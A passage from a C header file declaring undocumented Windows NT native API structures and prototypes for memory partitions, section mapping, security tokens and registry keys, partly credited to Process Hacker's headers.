SystemMemoryPartitionMemoryChargeAttributes,\n    SystemMemoryPartitionClearAttributes,\n    SystemMemoryPartitionSetMemoryThresholds,\n    SystemMemoryPartitionMemoryListCommand,\n    SystemMemoryPartitionMax\n} MEMORY_PARTITION_INFORMATION_CLASS;\n\ntypedef struct _MEMORY_PARTITION_PAGE_RANGE {\n    ULONG_PTR StartPage;\n    ULONG_PTR NumberOfPages;\n} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;\n\ntypedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {\n    ULONG Flags;\n    ULONG NumberOfRanges;\n    ULONG_PTR NumberOfPagesAdded;\n    MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];\n} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {\n    PVOID StopHandle;\n    ULONG Flags;\n    ULONG_PTR TotalNumberOfPages;\n} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {\n    UNICODE_STRING PageFileName;\n    LARGE_INTEGER MinimumSize;\n    LARGE_INTEGER MaximumSize;\n    ULONG Flags;\n} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {\n    ULONG_PTR NumberOfPages;\n    ULONG NumaNode;\n    ULONG Flags;\n} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;\n\ntypedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {\n    ULONG Flags;\n    ULONG NumaNode;\n    ULONG Channel;\n    ULONG NumberOfNumaNodes;\n    ULONG_PTR ResidentAvailablePages;\n    ULONG_PTR CommittedPages;\n    ULONG_PTR CommitLimit;\n    ULONG_PTR PeakCommitment;\n    ULONG_PTR TotalNumberOfPages;\n    ULONG_PTR AvailablePages;\n    ULONG_PTR ZeroPages;\n    ULONG_PTR FreePages;\n    ULONG_PTR StandbyPages;\n\n    // Fields added RS1+\n    ULONG_PTR StandbyPageCountByPriority[8];\n    ULONG_PTR RepurposedPagesByPriority[8];\n    ULONG_PTR MaximumCommitLimit;\n    ULONG_PTR 
DonatedPagesToPartitions;\n    ULONG PartitionId;\n} MEMORY_PARTITION_CONFIGURATION_INFORMATION, * PMEMORY_PARTITION_CONFIGURATION_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSection(\n    _Out_ PHANDLE SectionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ PLARGE_INTEGER MaximumSize,\n    _In_ ULONG SectionPageProtection,\n    _In_ ULONG AllocationAttributes,\n    _In_opt_ HANDLE FileHandle);\n\n//taken from ph2\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateSectionEx(\n    _Out_ PHANDLE SectionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_opt_ PLARGE_INTEGER MaximumSize,\n    _In_ ULONG SectionPageProtection,\n    _In_ ULONG AllocationAttributes,\n    _In_opt_ HANDLE FileHandle,\n    _Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,\n    _In_ ULONG ExtendedParameterCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenSection(\n    _Out_ PHANDLE SectionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapViewOfSection(\n    _In_ HANDLE SectionHandle,\n    _In_ HANDLE ProcessHandle,\n    _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID *BaseAddress,\n    _In_ ULONG_PTR ZeroBits,\n    _In_ SIZE_T CommitSize,\n    _Inout_opt_ PLARGE_INTEGER SectionOffset,\n    _Inout_ PSIZE_T ViewSize,\n    _In_ SECTION_INHERIT InheritDisposition,\n    _In_ ULONG AllocationType,\n    _In_ ULONG Win32Protect);\n\n//taken from ph2\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapViewOfSectionEx(\n    _In_ HANDLE SectionHandle,\n    _In_ HANDLE ProcessHandle,\n    _Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID* BaseAddress,\n    _Inout_opt_ PLARGE_INTEGER SectionOffset,\n    _Inout_ PSIZE_T ViewSize,\n    _In_ ULONG 
AllocationType,\n    _In_ ULONG Win32Protect,\n    _Inout_updates_opt_(ParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,\n    _In_ ULONG ExtendedParameterCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnmapViewOfSection(\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ PVOID BaseAddress);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnmapViewOfSectionEx(\n    _In_ HANDLE ProcessHandle,\n    _In_opt_ PVOID BaseAddress,\n    _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySection(\n    _In_ HANDLE SectionHandle,\n    _In_ SECTION_INFORMATION_CLASS SectionInformationClass,\n    _Out_writes_bytes_(SectionInformationLength) PVOID SectionInformation,\n    _In_ SIZE_T SectionInformationLength,\n    _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtExtendSection(\n    _In_ HANDLE SectionHandle,\n    _Inout_ PLARGE_INTEGER NewSectionSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapUserPhysicalPages(\n    _In_ PVOID VirtualAddress,\n    _In_ ULONG_PTR NumberOfPages,\n    _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtMapUserPhysicalPagesScatter(\n    _In_reads_(NumberOfPages) PVOID *VirtualAddresses,\n    _In_ ULONG_PTR NumberOfPages,\n    _In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateUserPhysicalPages(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PULONG_PTR NumberOfPages,\n    _Out_writes_(*NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFreeUserPhysicalPages(\n    _In_ HANDLE ProcessHandle,\n    _Inout_ PULONG_PTR NumberOfPages,\n    _In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAreMappedFilesTheSame(\n    _In_ PVOID File1MappedAsAnImage,\n    _In_ PVOID File2MappedAsFile);\n\n//\n// NtCreatePartition\n//\n\n//\n// 10248\n//\ntypedef NTSTATUS(NTAPI* pfnNtCreatePartitionV1)(\n    _Out_ PHANDLE PartitionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG 
PreferredNode);\n\n//\n// 10586\n//\ntypedef NTSTATUS(NTAPI* pfnNtCreatePartitionV2)(\n    _In_ HANDLE ParentPartitionHandle,\n    _Out_ HANDLE* PartitionHandle,\n    _In_ ULONG DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG Node);\n\n//\n// Actual NtCreatePartition definition since Win10 10586\n//\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePartition(\n    _In_ HANDLE ParentPartitionHandle,\n    _Out_ HANDLE* PartitionHandle,\n    _In_ ULONG DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG Node);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenPartition(\n    _Out_ PHANDLE PartitionHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtManagePartition(\n    _In_ HANDLE TargetHandle,\n    _In_opt_ HANDLE SourceHandle,\n    _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,\n    _Inout_updates_bytes_(PartitionInformationLength) PVOID PartitionInformation,\n    _In_ ULONG PartitionInformationLength);\n\n/************************************************************************************\n*\n* Token API.\n*\n************************************************************************************/\n//\n// This part is taken from PH ntseapi.h.\n//\n\n// Types\n\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INVALID 0x00\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INT64 0x01\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_UINT64 0x02\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_STRING 0x03\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_FQBN 0x04\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_SID 0x05\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_BOOLEAN 0x06\n#define TOKEN_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING 0x10\n\n// Flags\n\n#define TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE 0x0001\n#define TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE 0x0002\n#define TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY 0x0004\n#define TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT 0x0008\n#define 
TOKEN_SECURITY_ATTRIBUTE_DISABLED 0x0010\n#define TOKEN_SECURITY_ATTRIBUTE_MANDATORY 0x0020\n#define TOKEN_SECURITY_ATTRIBUTE_COMPARE_IGNORE 0x0040\n\n#define TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS ( \\\n    TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE | \\\n    TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE | \\\n    TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY | \\\n    TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT | \\\n    TOKEN_SECURITY_ATTRIBUTE_DISABLED | \\\n    TOKEN_SECURITY_ATTRIBUTE_MANDATORY)\n\n#define TOKEN_SECURITY_ATTRIBUTE_CUSTOM_FLAGS 0xffff0000\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE\n{\n    ULONG64 Version;\n    UNICODE_STRING Name;\n} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE\n{\n    PVOID pValue;\n    ULONG ValueLength;\n} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTE_V1\n{\n    UNICODE_STRING Name;\n    USHORT ValueType;\n    USHORT Reserved;\n    ULONG Flags;\n    ULONG ValueCount;\n    union\n    {\n        PLONG64 pInt64;\n        PULONG64 pUint64;\n        PUNICODE_STRING pString;\n        PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;\n        PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;\n    } Values;\n} TOKEN_SECURITY_ATTRIBUTE_V1, *PTOKEN_SECURITY_ATTRIBUTE_V1;\n\n#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1 1\n#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1\n\ntypedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION\n{\n    USHORT Version;\n    USHORT Reserved;\n    ULONG AttributeCount;\n    union\n    {\n        PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;\n    } Attribute;\n} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, *PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;\n\n//\n// endof ntseapi.h\n//\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAccessCheck(\n    _In_ PSECURITY_DESCRIPTOR 
SecurityDescriptor,\n    _In_ HANDLE ClientToken,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ PGENERIC_MAPPING GenericMapping,\n    _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,\n    _Inout_ PULONG PrivilegeSetLength,\n    _Out_ PACCESS_MASK GrantedAccess,\n    _Out_ PNTSTATUS AccessStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAccessCheckByType(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_opt_ PSID PrincipalSelfSid,\n    _In_ HANDLE ClientToken,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,\n    _In_ ULONG ObjectTypeListLength,\n    _In_ PGENERIC_MAPPING GenericMapping,\n    _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,\n    _Inout_ PULONG PrivilegeSetLength,\n    _Out_ PACCESS_MASK GrantedAccess,\n    _Out_ PNTSTATUS AccessStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAccessCheckByTypeResultList(\n    _In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_opt_ PSID PrincipalSelfSid,\n    _In_ HANDLE ClientToken,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,\n    _In_ ULONG ObjectTypeListLength,\n    _In_ PGENERIC_MAPPING GenericMapping,\n    _Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,\n    _Inout_ PULONG PrivilegeSetLength,\n    _Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess,\n    _Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenObjectAuditAlarm(\n    _In_ PUNICODE_STRING SubsystemName,\n    _In_opt_ PVOID HandleId,\n    _In_ PUNICODE_STRING ObjectTypeName,\n    _In_ PUNICODE_STRING ObjectName,\n    _In_opt_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n    _In_ HANDLE ClientToken,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ ACCESS_MASK GrantedAccess,\n    _In_opt_ PPRIVILEGE_SET Privileges,\n    _In_ BOOLEAN ObjectCreation,\n    _In_ BOOLEAN AccessGranted,\n    _Out_ PBOOLEAN 
GenerateOnClose);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCloseObjectAuditAlarm(\n    _In_ PUNICODE_STRING SubsystemName,\n    _In_opt_ PVOID HandleId,\n    _In_ BOOLEAN GenerateOnClose);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteObjectAuditAlarm(\n    _In_ PUNICODE_STRING SubsystemName,\n    _In_opt_ PVOID HandleId,\n    _In_ BOOLEAN GenerateOnClose);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenProcessToken(\n    _In_ HANDLE ProcessHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenProcessTokenEx(\n    _In_ HANDLE ProcessHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ ULONG HandleAttributes,\n    _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDuplicateToken(\n    _In_ HANDLE ExistingTokenHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ BOOLEAN EffectiveOnly,\n    _In_ TOKEN_TYPE TokenType,\n    _Out_ PHANDLE NewTokenHandle);\n\n#ifndef DISABLE_MAX_PRIVILEGE\n#define DISABLE_MAX_PRIVILEGE   0x1 // winnt\n#endif\n\n#ifndef SANDBOX_INERT\n#define SANDBOX_INERT           0x2 // winnt\n#endif\n\n#ifndef LUA_TOKEN\n#define LUA_TOKEN               0x4 // winnt\n#endif\n\n#ifndef WRITE_RESTRICTED\n#define WRITE_RESTRICTED        0x8 // winnt\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFilterToken(\n    _In_ HANDLE ExistingTokenHandle,\n    _In_ ULONG Flags,\n    _In_opt_ PTOKEN_GROUPS SidsToDisable,\n    _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,\n    _In_opt_ PTOKEN_GROUPS RestrictedSids,\n    _Out_ PHANDLE NewTokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtImpersonateAnonymousToken(\n    _In_ HANDLE ThreadHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationToken(\n    _In_ HANDLE TokenHandle,\n    _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,\n    _Out_writes_bytes_to_opt_(TokenInformationLength, *ReturnLength) PVOID TokenInformation,\n    _In_ ULONG TokenInformationLength,\n    _Out_ PULONG 
ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationToken(\n    _In_ HANDLE TokenHandle,\n    _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,\n    _In_reads_bytes_(TokenInformationLength) PVOID TokenInformation,\n    _In_ ULONG TokenInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenThreadToken(\n    _In_ HANDLE ThreadHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ BOOLEAN OpenAsSelf,\n    _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenThreadTokenEx(\n    _In_ HANDLE ThreadHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ BOOLEAN OpenAsSelf,\n    _In_ ULONG HandleAttributes,\n    _Out_ PHANDLE TokenHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAdjustPrivilegesToken(\n    _In_ HANDLE TokenHandle,\n    _In_ BOOLEAN DisableAllPrivileges,\n    _In_opt_ PTOKEN_PRIVILEGES NewState,\n    _In_ ULONG BufferLength,\n    _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAdjustGroupsToken(\n    _In_ HANDLE TokenHandle,\n    _In_ BOOLEAN ResetToDefault,\n    _In_opt_ PTOKEN_GROUPS NewState,\n    _In_opt_ ULONG BufferLength,\n    _Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState,\n    _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompareTokens(\n    _In_ HANDLE FirstTokenHandle,\n    _In_ HANDLE SecondTokenHandle,\n    _Out_ PBOOLEAN Equal);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtPrivilegeCheck(\n    _In_ HANDLE ClientToken,\n    _Inout_ PPRIVILEGE_SET RequiredPrivileges,\n    _Out_ PBOOLEAN Result);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateToken(\n    _Out_ PHANDLE TokenHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ TOKEN_TYPE TokenType,\n    _In_ PLUID AuthenticationId,\n    _In_ PLARGE_INTEGER ExpirationTime,\n    _In_ PTOKEN_USER User,\n    _In_ PTOKEN_GROUPS Groups,\n    _In_ PTOKEN_PRIVILEGES Privileges,\n    _In_opt_ 
PTOKEN_OWNER Owner,\n    _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,\n    _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,\n    _In_ PTOKEN_SOURCE TokenSource);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTokenEx(\n    _Out_ PHANDLE TokenHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ TOKEN_TYPE TokenType,\n    _In_ PLUID AuthenticationId,\n    _In_ PLARGE_INTEGER ExpirationTime,\n    _In_ PTOKEN_USER User,\n    _In_ PTOKEN_GROUPS Groups,\n    _In_ PTOKEN_PRIVILEGES Privileges,\n    _In_opt_ PVOID UserAttributes, // points to TOKEN_SECURITY_ATTRIBUTES_INFORMATION\n    _In_opt_ PVOID DeviceAttributes, // points to PTOKEN_SECURITY_ATTRIBUTES_INFORMATION\n    _In_opt_ PTOKEN_GROUPS DeviceGroups,\n    _In_opt_ PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy,\n    _In_opt_ PTOKEN_OWNER Owner,\n    _In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,\n    _In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,\n    _In_ PTOKEN_SOURCE TokenSource);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateLowBoxToken(\n    _Out_ PHANDLE TokenHandle,\n    _In_ HANDLE ExistingTokenHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ PSID PackageSid,\n    _In_ ULONG CapabilityCount,\n    _In_reads_opt_(CapabilityCount) PSID_AND_ATTRIBUTES Capabilities,\n    _In_ ULONG HandleCount,\n    _In_reads_opt_(HandleCount) HANDLE *Handles);\n\n/************************************************************************************\n*\n* Registry API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateKey(\n    _Out_ PHANDLE KeyHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _Reserved_ ULONG TitleIndex,\n    _In_opt_ PUNICODE_STRING Class,\n    _In_ ULONG CreateOptions,\n    _Out_opt_ PULONG Disposition);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateKeyTransacted(\n    _Out_ PHANDLE KeyHandle,\n    _In_ ACCESS_MASK 
DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _Reserved_ ULONG TitleIndex,\n    _In_opt_ PUNICODE_STRING Class,\n    _In_ ULONG CreateOptions,\n    _In_ HANDLE TransactionHandle,\n    _Out_opt_ PULONG Disposition);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKey(\n    _Out_ PHANDLE KeyHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyEx(\n    _Out_ PHANDLE KeyHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG OpenOptions);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyTransacted(\n    _Out_ PHANDLE KeyHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ HANDLE TransactionHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyTransactedEx(\n    _Out_ PHANDLE KeyHandle,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n    _In_ ULONG OpenOptions,\n    _In_ HANDLE TransactionHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryKey(\n    _In_ HANDLE KeyHandle,\n    _In_ KEY_INFORMATION_CLASS KeyInformationClass,\n    _Out_writes_bytes_opt_(Length) PVOID KeyInformation,\n    _In_ ULONG Length,\n    _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtEnumerateKey(\n    _In_ HANDLE KeyHandle,\n    _In_ ULONG Index,\n    _In_ KEY_INFORMATION_CLASS KeyInformationClass,\n    _Out_writes_bytes_opt_(Length) PVOID KeyInformation,\n    _In_ ULONG Length,\n    _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtEnumerateValueKey(\n    _In_ HANDLE KeyHandle,\n    _In_ ULONG Index,\n    _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\n    _Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,\n    _In_ ULONG Length,\n    _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryValueKey(\n    _In_ HANDLE KeyHandle,\n    _In_ PUNICODE_STRING ValueName,\n    _In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\n    
_Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,\n    _In_ ULONG Length,\n    _Out_ PULONG ResultLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryMultipleValueKey(\n    _In_ HANDLE KeyHandle,\n    _Inout_updates_(EntryCount) PKEY_VALUE_ENTRY ValueEntries,\n    _In_ ULONG EntryCount,\n    _Out_writes_bytes_(*BufferLength) PVOID ValueBuffer,\n    _Inout_ PULONG BufferLength,\n    _Out_opt_ PULONG RequiredBufferLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetValueKey(\n    _In_ HANDLE KeyHandle,\n    _In_ PUNICODE_STRING ValueName,\n    _In_ ULONG TitleIndex,\n    _In_ ULONG Type,\n    _In_reads_bytes_opt_(DataSize) PVOID Data,\n    _In_ ULONG DataSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteKey(\n    _In_ HANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDeleteValueKey(\n    _In_ HANDLE KeyHandle,\n    _In_ PUNICODE_STRING ValueName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRenameKey(\n    _In_ HANDLE KeyHandle,\n    _In_ PUNICODE_STRING NewName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationKey(\n    _In_ HANDLE KeyHandle,\n    _In_ KEY_SET_INFORMATION_CLASS KeySetInformationClass,\n    _In_reads_bytes_(KeySetInformationLength) PVOID KeySetInformation,\n    _In_ ULONG KeySetInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFlushKey(\n    _In_ HANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCompressKey(\n    _In_ HANDLE Key);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKey(\n    _In_ POBJECT_ATTRIBUTES TargetKey,\n    _In_ POBJECT_ATTRIBUTES SourceFile);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKey2(\n    _In_ POBJECT_ATTRIBUTES TargetKey,\n    _In_ POBJECT_ATTRIBUTES SourceFile,\n    _In_ ULONG Flags);\n\n//https://gist.github.com/tyranid/1db47869da253a912242c694e921009d#file-ntloadkeyex3-h\n\ntypedef enum _KEY_LOAD_HANDLE_TYPE {\n    KeyLoadTrustKey = 1,\n    KeyLoadEvent,\n    KeyLoadToken\n} KEY_LOAD_HANDLE_TYPE;\n\ntypedef struct _KEY_LOAD_HANDLE {\n    KEY_LOAD_HANDLE_TYPE Type;\n    HANDLE Handle;\n} KEY_LOAD_HANDLE, 
*PKEY_LOAD_HANDLE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKey3(\n    _In_ POBJECT_ATTRIBUTES TargetKey,\n    _In_ POBJECT_ATTRIBUTES SourceFile,\n    _In_ ULONG Flags,\n    _In_ PKEY_LOAD_HANDLE LoadEntries,\n    _In_ ULONG LoadEntryCount,\n    _In_opt_ ACCESS_MASK DesiredAccess,\n    _Out_opt_ PHANDLE RootHandle,\n    _In_ PVOID Unused);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLoadKeyEx(\n    _In_ POBJECT_ATTRIBUTES TargetKey,\n    _In_ POBJECT_ATTRIBUTES SourceFile,\n    _In_ ULONG Flags,\n    _In_opt_ HANDLE TrustClassKey,\n    _In_opt_ HANDLE Event,\n    _In_opt_ ACCESS_MASK DesiredAccess,\n    _Out_opt_ PHANDLE RootHandle,\n    _Out_opt_ PIO_STATUS_BLOCK IoStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSaveKey(\n    _In_ HANDLE KeyHandle,\n    _In_ HANDLE FileHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSaveKeyEx(\n    _In_ HANDLE KeyHandle,\n    _In_ HANDLE FileHandle,\n    _In_ ULONG Format);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadKey(\n    _In_ POBJECT_ATTRIBUTES TargetKey);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnloadKey2(\n    _In_ 